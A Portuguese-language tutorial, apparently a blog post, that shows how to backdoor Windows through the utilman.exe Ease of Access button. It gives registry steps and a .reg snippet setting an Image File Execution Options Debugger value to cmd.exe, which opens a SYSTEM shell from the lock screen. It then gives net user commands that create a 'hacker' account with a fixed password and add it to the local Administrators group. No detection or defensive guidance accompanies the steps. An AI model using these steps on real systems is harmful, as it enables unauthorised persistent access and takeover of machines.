utilman.exe - Explorando o recurso de Facilidade de acesso

Como você já deve estar familiarizado o utilman.exe ou Utility Manager é um recurso do sistema operacional que lhe permite realizar as configuração do sistema, tais como: Tela, Ponteiro do Mouse, Cursor de texto, Lupa entre outros, mas se um atacante criar uma chave de registro no regedit utilizando o nome utilman.exe e pode conseguir obter acesso em seu computador.

01 - Passo

Observe que ao clicar no botão Facilidade de acesso você pode realizar ajustes da tela e entre outros recursos.

Windows

02 - Passo

Entre no Regedit na chave Image File Execution Options e crie uma Nova Chave e nomeie como utilman.exe

Regedit

Computador\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

03 - Passo

Entre na chave utilman.exe e crie um Novo Valor de Cadeia de Caracteres e nomeie como Debugger.

Regedit

Computador\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe

04 - Passo

Insira o valor C:\Windows\System32\cmd.exe, desta forma quando clicarmos no botão Facilidade de acesso com a Tela Bloqueada será possível iniciar o Prompt de Comando com privilégio de System.

Regedit

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"

05 - Passo

Agora basta clicar no botão Facilidade de acesso para que o Prompt de Comando seja iniciado, e para validar seu perfil de acesso digite o comando abaixo:

Prompt de Comando

whoami

06 - Passo

Para criar um Novo Usuário e incluí-lo ao grupo de Administradores digite os comandos abaixo:

Prompt de Comando

net user hacker P@ssword /add
Cria o usuário hacker

net localgroup Administradores hacker /add
Insere o usuário hacker no grupo de Administradores Local

07 - Passo

Logue com o novo usuário:

Usuário: hacker
Senha: P@ssword

Logon realizado com sucesso!